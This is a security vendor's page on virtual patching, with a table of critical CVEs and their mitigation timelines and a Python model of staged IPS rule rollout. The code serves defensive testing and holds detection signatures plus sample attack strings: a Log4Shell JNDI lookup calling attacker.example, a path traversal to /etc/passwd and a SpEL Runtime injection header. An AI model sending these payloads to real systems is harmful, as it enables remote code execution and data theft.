Rapid CVE Mitigation by Cato Security Research

OWASP defines virtual patching as "a security policy enforcement layer which prevents the exploitation of a known vulnerability". Cato performs virtual patching in the IPS layer of the Cato Single Pass Cloud Engine (SPACE): Cato security researchers write and deploy new IPS rules for newly published CVEs without requiring any customer involvement. A virtual patch narrows the window of exposure while a vendor fix is tested and rolled out; it does not remove the vulnerability from the affected system, so the vulnerable software itself still has to be patched.

Selected Critical CVEs mitigated by Cato

For each CVE the table lists the CVSS severity score, the elapsed time from Cato's detection of the threat to global protection ("Detect to Protect"), and the timestamps of the three rollout stages described below: detection, opt-in protection (rule available to customers who enable it) and global protection (rule enforced for all customers). Timestamps without a timezone are given as published.

Atlassian Confluence Data Center & Server Remote Code Execution
CVE: CVE-2023-22527
Severity Score: 10 (Critical)
Detect to Protect: 1 day
Description: A template injection vulnerability in out-of-date versions of Atlassian Confluence Data Center and Server that allows an unauthenticated attacker to achieve remote code execution.
Detection: January 22, 2024
Opt-in Protection: January 22, 2024, 19:00 UTC
Global Protection: January 23, 2024, 11:00 UTC

Apache Struts 2 File Upload Remote Code Execution
CVE: CVE-2023-50164
Severity Score: 9.8 (Critical)
Detect to Protect: 1 day
Description: Flawed handling of file upload parameters in the Apache Struts 2 web framework allows path traversal during upload, so an attacker can write a malicious file (such as a web shell) to a location from which it is executed, resulting in remote code execution.
Detection: POC available, December 12, 2023
Opt-in Protection: December 12, 2023
Global Protection: December 13, 2023

Cisco IOS XE Web UI Privilege Escalation Vulnerability
CVE: CVE-2023-20198
Severity Score: 10 (Critical)
Detect to Protect: 2 days
Description: Privilege escalation in Cisco devices running IOS XE with the HTTP Server (web UI) feature enabled and exposed to the internet or untrusted networks: an unauthenticated remote attacker can create an account with privilege level 15 and take full control of the device.
Detection: POC available, October 30, 2023 20:30 UTC
Opt-in Protection: October 31, 2023 20:00 UTC
Global Protection: November 1, 2023 20:00 UTC

cURL SOCKS5 Proxy Heap Buffer Overflow
CVE: CVE-2023-38545
Severity Score: 7.5 (High)
Detect to Protect: 1 day and 3 hours
Description: A heap buffer overflow in the SOCKS5 proxy handshake of curl and libcurl. When a hostname longer than 255 bytes is used and the handshake is slow, the library copies the hostname into a too-small heap buffer instead of passing it to the proxy for remote resolution; the overflow can be exploited for code execution in the vulnerable libcurl client.
Detection: October 11, 2023 06:30 UTC
Opt-in Protection: October 11, 2023 20:00 UTC
Global Protection: October 12, 2023 09:30 UTC

Atlassian Confluence Data Center & Server Privilege Escalation Vulnerability
CVE: CVE-2023-22515
Severity Score: 10 (Critical)
Detect to Protect: 1 day and 23 hours
Description: A broken access control (privilege escalation) vulnerability in on-premises Atlassian Confluence Data Center and Server; attackers exploit a vulnerable endpoint to create unauthorized Confluence administrator accounts and gain access to the instance.
Detection: October 4, 2023 13:00 UTC
Opt-in Protection: October 5, 2023 11:00 UTC
Global Protection: October 6, 2023 12:00 UTC

MOVEit Transfer SQL Injection
CVE: CVE-2023-34362
Severity Score: 9.8 (Critical)
Detect to Protect: 3 days and 6 hours
Description: A SQL injection in the managed file transfer (MFT) product MOVEit Transfer by Progress Software lets an unauthenticated attacker execute SQL statements against the backend database; in-the-wild exploitation was followed by the installation of a dedicated web shell backdoor, giving remote code execution and data theft.
Detection: June 6, 2023 at 8:00 AM
Opt-in Protection: June 8, 2023 at 4:30 PM
Global Protection: June 9, 2023 at 2:00 PM

Microsoft Outlook Remote Hash Vulnerability
CVE: CVE-2023-23397
Severity Score: 9.8 (Critical)
Detect to Protect: 0 (see description)
Description: Microsoft Outlook elevation of privilege vulnerability: a crafted message carries an extended MAPI property pointing to an attacker-controlled UNC path, so the Outlook client connects to the attacker's SMB server and leaks the user's Net-NTLMv2 hash without any user interaction. Detect to Protect is zero because outbound SMB traffic is blocked by default on Cato's firewall, which stops the hash from leaving the network.
Detection: March 3, 2023 at 8:02 AM
Opt-in Protection: March 3, 2023 at 8:02 AM
Global Protection: March 3, 2023 at 8:02 AM

OWASSRF, MS Exchange RCE
CVE: CVE-2022-41082
Severity Score: 8.8 (High)
Detect to Protect: 23 hours, 45 minutes
Description: OWASSRF is an exploit chain, disclosed by CrowdStrike in December 2022, that reaches CVE-2022-41082 (the remote code execution half of ProxyNotShell) through Outlook Web Access via CVE-2022-41080, bypassing the URL rewrite mitigations Microsoft had issued for ProxyNotShell. Exchange servers that relied on those mitigations instead of the November 2022 security update remained vulnerable to RCE.
Detection: December 21, 2022 at 5:00 PM
Opt-in Protection: December 21, 2022 at 11:29 PM
Global Protection: December 22, 2022 at 4:45 PM

Microsoft Exchange Remote Code Execution (ProxyNotShell)
CVE: CVE-2022-41040, CVE-2022-41082
Severity Score: 8.8 (High)
Detect to Protect: 2 days, 10 hours, 6 minutes
Description: CVE-2022-41040 is a server-side request forgery (Microsoft's title: Microsoft Exchange Server Elevation of Privilege Vulnerability) chained with CVE-2022-41082 for remote code execution through PowerShell remoting; the chain requires authenticated access to the vulnerable Exchange Server.
Detection: September 30, 2022 at 1:19 PM
Opt-in Protection: September 30, 2022 at 11:25 PM
Global Protection: October 2, 2022 at 12:40 PM

DogWalk, Microsoft Windows Support Diagnostic Tool Remote Code Execution
CVE: CVE-2022-34713
Severity Score: 7.8 (High)
Detect to Protect: 2 days, 4 hours, 54 minutes
Description: A path traversal in the Microsoft Windows Support Diagnostic Tool (MSDT): a crafted .diagcab diagnostic package can drop a file into the user's Startup folder, where it runs at the next logon, giving remote code execution.
Detection: August 10, 2022 at 11:22 AM
Opt-in Protection: August 11, 2022 at 6:38 PM
Global Protection: August 12, 2022 at 4:16 PM

Apache Spark Remote Code Execution
CVE: CVE-2022-33891
Severity Score: 8.8 (High)
Detect to Protect: 1 day, 7 hours, 17 minutes
Description: The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input and execute it. This results in arbitrary shell command execution as the user Spark is running as. Affected versions: Apache Spark 3.0.3 and earlier, 3.1.1 to 3.1.2, and 3.2.0 to 3.2.1.
Detection: July 19, 2022 at 10:06 AM
Opt-in Protection: July 19, 2022 at 7:25 PM
Global Protection: July 20, 2022 at 5:23 PM

Microsoft Support Diagnostic Tool Remote Code Execution (Follina)
CVE: CVE-2022-30190
Severity Score: 7.8 (High)
Detect to Protect: 1 day, 8 hours, 17 minutes
Description: A remote code execution vulnerability in MSDT. When a calling application such as Microsoft Word invokes MSDT through the ms-msdt: URL protocol handler from a crafted document, the attacker can run arbitrary code with the privileges of the calling application.
Detection: May 31, 2022 at 8:43 AM
Opt-in Protection: May 31, 2022 at 10:06 PM
Global Protection: June 1, 2022 at 5:00 PM

VMware Tanzu Spring Cloud Function Remote Code Execution
CVE: CVE-2022-22963
Severity Score: 9.8 (Critical)
Detect to Protect: 2 days, 1 hour, 54 minutes
Description: In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when the routing functionality is used, a user can supply a specially crafted SpEL expression as the routing expression (for example in the spring.cloud.function.routing-expression HTTP header), which may result in remote code execution and access to local resources.
Detection: March 30, 2022 at 6:00 PM
Opt-in Protection: March 30, 2022 at 11:09 PM
Global Protection: April 1, 2022 at 7:54 PM

Log4Shell
CVE: CVE-2021-44228
Severity Score: 10.0 (Critical)
Detect to Protect: 17 hours, 2 minutes
Description: In Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3 and 2.3.1), the JNDI features used in configuration, log messages and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
Detection: December 10, 2021 at 8:45 PM
Opt-in Protection: December 11, 2021 at 3:16 AM
Global Protection: December 11, 2021 at 1:47 PM

Apache HTTP Server Path Traversal
CVE: CVE-2021-41773
Severity Score: 7.5 (High)
Detect to Protect: 1 day, 16 hours, 46 minutes
Description: A flaw in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow remote code execution. The fix in 2.4.50 was incomplete and the bypass was assigned CVE-2021-42013; 2.4.51 fixes both.
Detection: October 6, 2021 at 7:19 AM
Opt-in Protection: October 7, 2021 at 2:01 PM
Global Protection: October 8, 2021 at 12:05 AM

Exchange Autodiscover Password
CVE: -
Severity Score: (Critical)
Detect to Protect: 5 days, 5 hours, 30 minutes
Description: -
Detection: September 30, 2021 at 2:33 PM
Opt-in Protection: September 30, 2021 at 5:40 PM
Global Protection: October 5, 2021 at 8:03 PM

VMware vCenter RCE (II)
CVE: CVE-2021-22005
Severity Score: 9.8 (Critical)
Detect to Protect: 3 days, 10 hours, 1 minute
Description: The vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file.
Detection: September 23, 2021 at 8:36 AM
Opt-in Protection: September 23, 2021 at 6:23 PM
Global Protection: September 26, 2021 at 6:37 PM

PrintNightmare Print Spooler RCE Vulnerability
CVE: CVE-2021-1675
Severity Score: 8.8 (High)
Detect to Protect: 6 days, 6 hours, 28 minutes
Description: Windows Print Spooler vulnerability. Microsoft's June 2021 advisory for CVE-2021-1675 titled it an Elevation of Privilege; after a public exploit showed remote code execution by authenticated domain users, Microsoft tracked the RCE variant separately as CVE-2021-34527 in July 2021.
Detection: July 5, 2021 at 12:16 PM
Opt-in Protection: July 11, 2021 at 10:52 AM
Global Protection: July 11, 2021 at 6:44 PM

vSphere Client (HTML5) Remote Code Execution
CVE: CVE-2021-21985
Severity Score: 9.8 (Critical)
Detect to Protect: 3 days, 11 hours, 29 minutes
Description: The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in, which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.
Detection: May 31, 2021 at 10:55 AM
Opt-in Protection: June 1, 2021 at 9:47 PM
Global Protection: June 3, 2021 at 10:24 PM

F5 BIG-IP and BIG-IQ iControl REST Remote Command Execution
CVE: CVE-2021-22986
Severity Score: 9.8 (Critical)
Detect to Protect: 2 days, 19 hours, 38 minutes
Description: On specific versions of BIG-IP and BIG-IQ, the iControl REST interface has an unauthenticated remote command execution vulnerability that lets an attacker with network access to the management interface or self IP addresses execute arbitrary system commands.
Detection: March 20, 2021 at 11:43 PM
Opt-in Protection: March 23, 2021 at 12:12 PM
Global Protection: March 23, 2021 at 7:21 PM

MS Exchange SSRF (ProxyLogon)
CVE: CVE-2021-26855
Severity Score: 9.8 (Critical)
Detect to Protect: 4 days, 2 hours, 23 minutes
Description: A server-side request forgery in Microsoft Exchange Server that lets an unauthenticated attacker send arbitrary HTTP requests and authenticate as the Exchange server; it is the entry point of the ProxyLogon chain exploited in the wild for remote code execution (Microsoft's title: Microsoft Exchange Server Remote Code Execution Vulnerability).
Detection: March 3, 2021 at 11:03 AM
Opt-in Protection: March 4, 2021 at 10:48 PM
Global Protection: March 7, 2021 at 1:26 PM

VMware vCenter RCE
CVE: CVE-2021-21972
Severity Score: 9.8 (Critical)
Detect to Protect: 1 day, 1 hour, 57 minutes
Description: The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin (the vRealize Operations plugin). A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.
Detection: February 25, 2021 at 10:06 AM
Opt-in Protection: February 25, 2021 at 7:16 PM
Global Protection: February 26, 2021 at 12:03 PM

Why is CVE Mitigation such a challenge?

Customers often struggle with the process, resources, and time it takes to protect their networks from emerging CVEs. Here is why:

The vendor must research the CVE and develop a signature

The customer needs to test the signature within a maintenance window

Customer testing must ensure the signature is not breaking the traffic or impacting inspection performance or the user experience

Only when testing is successful, can the signature be activated

This resource-intensive process causes many customers to run their Intrusion Prevention System (IPS) in detection-only mode or to fall behind on maintaining an optimal security posture. This increases the risk of a breach, as attackers attempt to exploit unpatched CVEs, including old ones.

Fully automated Virtual Patching of Emerging CVEs with Cato Networks

Cato’s process for virtual patching consists of four steps, performed by the Cato security team:

Assessment

Assessing the scope of the CVE and researching the vulnerability, in particular whether and how it is being exploited in the wild

Understanding which systems are affected and how threat actors perform the attack

Development

Creating a new IPS rule to virtually patch the vulnerability

Eliminating false positives by backtesting the rule against traffic metadata

Opt-in Protection

Selective deployment of the virtual patch in "simulate mode", in which matches are logged but not blocked

Enabling opt-in prevention for specific customers

Global Protection

Moving the virtual patch to prevention mode

Enforcing the virtual patch across all customers and all traffic

This process runs without any involvement of customer resources and without putting the customer's business operations at risk.
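The lifecycle above (write a rule, backtest it for false positives, observe it in simulate mode, then promote it to prevention) can be modelled in a few dozen lines. The following is an added example written for this page, not Cato's IPS code: the three signatures are simplified assumptions for CVEs in the table (a `${jndi:` lookup for Log4Shell, the encoded-dot traversal for Apache 2.4.49, and a `T(` type expression in the `spring.cloud.function.routing-expression` header for Spring Cloud Function), and the sample requests are constructed. It also carries a deliberately over-broad draft rule so that the backtest step is seen rejecting a rule that would fire on benign traffic.

```python
"""Staged rollout of IPS virtual patches: backtest, simulate, then prevent.

Illustrative model only; the signatures are simplified assumptions and are not
vendor rules. Real engines normalize encodings and cover evasion variants.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List


@dataclass
class Request:
    """One HTTP request as an inline IPS sees it after TLS inspection."""
    method: str
    path: str
    headers: Dict[str, str]
    body: str = ""

    def surface(self) -> str:
        """Flatten request line, headers and body into the text a signature scans."""
        hdrs = "\n".join(f"{k}: {v}" for k, v in self.headers.items())
        return f"{self.method} {self.path}\n{hdrs}\n\n{self.body}"


@dataclass
class VirtualPatch:
    cve: str
    name: str
    pattern: re.Pattern          # simplified signature (assumption, not a vendor rule)
    mode: str = "simulate"       # "simulate": log matches only; "prevent": drop the request

    def matches(self, req: Request) -> bool:
        return self.pattern.search(req.surface()) is not None


def inspect(patches: Iterable[VirtualPatch], req: Request) -> dict:
    """Verdict for one request: which patches fired, and whether it is dropped."""
    hits = [p for p in patches if p.matches(req)]
    blocked = any(p.mode == "prevent" for p in hits)
    return {"action": "block" if blocked else "allow", "hits": [p.cve for p in hits]}


def backtest(patch: VirtualPatch, baseline: Iterable[Request]) -> int:
    """False-positive count: how often the rule fires on traffic known to be benign."""
    return sum(1 for req in baseline if patch.matches(req))


def promote(patch: VirtualPatch, baseline: List[Request], max_false_positives: int = 0) -> bool:
    """Move a rule from simulate to prevent only when the backtest is clean."""
    if backtest(patch, baseline) <= max_false_positives:
        patch.mode = "prevent"
        return True
    return False


# Simplified signatures for three CVEs from the table above (assumptions for this example).
PATCHES = [
    VirtualPatch("CVE-2021-44228", "Log4Shell JNDI lookup in any request field",
                 re.compile(r"\$\{[^}]*jndi\s*:", re.IGNORECASE)),
    VirtualPatch("CVE-2021-41773", "Apache 2.4.49 encoded-dot path traversal",
                 re.compile(r"/(?:\.%2e|%2e\.|%2e%2e)/", re.IGNORECASE)),
    VirtualPatch("CVE-2022-22963", "Spring Cloud Function SpEL in routing-expression header",
                 re.compile(r"^spring\.cloud\.function\.routing-expression:.*\bT\(",
                            re.IGNORECASE | re.MULTILINE)),
]

# Over-broad first draft of the Log4Shell rule, kept to show the backtest rejecting it.
DRAFT_TOO_BROAD = VirtualPatch("CVE-2021-44228", "Log4Shell (draft, too broad)",
                               re.compile(r"jndi", re.IGNORECASE))

# Constructed sample traffic, not captured data. BASELINE is known-benign and
# includes near-misses (the word "jndi" in a JSON body, "%2e%2e" in a query) that
# a sloppy rule would flag.
BASELINE = [
    Request("GET", "/cgi-bin/status", {"Host": "app.example", "User-Agent": "curl/8.4.0"}),
    Request("POST", "/api/notes", {"Host": "app.example", "Content-Type": "application/json"},
            '{"note": "configure the jndi datasource name"}'),
    Request("GET", "/search?q=%2e%2e", {"Host": "app.example"}),
]
ATTACKS = [
    Request("GET", "/login", {"Host": "app.example",
                              "User-Agent": "${jndi:ldap://attacker.example/a}"}),
    Request("GET", "/cgi-bin/.%2e/.%2e/.%2e/etc/passwd", {"Host": "app.example"}),
    Request("POST", "/functionRouter", {"Host": "app.example",
            "spring.cloud.function.routing-expression": "T(java.lang.Runtime).getRuntime()"}, "x"),
]


def rollout(patches: List[VirtualPatch], baseline: List[Request], attacks: List[Request]):
    """Run the lifecycle: observe in simulate mode, backtest, promote, then enforce."""
    before = [inspect(patches, a)["action"] for a in attacks]   # simulate: logged, not blocked
    promoted = [promote(p, baseline) for p in patches]
    after = [inspect(patches, a)["action"] for a in attacks]    # prevent: dropped
    return before, promoted, after


if __name__ == "__main__":
    print("draft rule false positives:", backtest(DRAFT_TOO_BROAD, BASELINE),
          "promoted:", promote(DRAFT_TOO_BROAD, BASELINE))
    print(rollout(PATCHES, BASELINE, ATTACKS))
```

Running the module shows the draft rule failing the backtest (one hit on the benign JSON body) and staying in simulate mode, while the three narrower rules backtest clean, let the attack requests through while simulating, and block them once promoted. The ordering is the point: a rule reaches prevention mode only after it has been shown not to match the traffic it must not touch.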
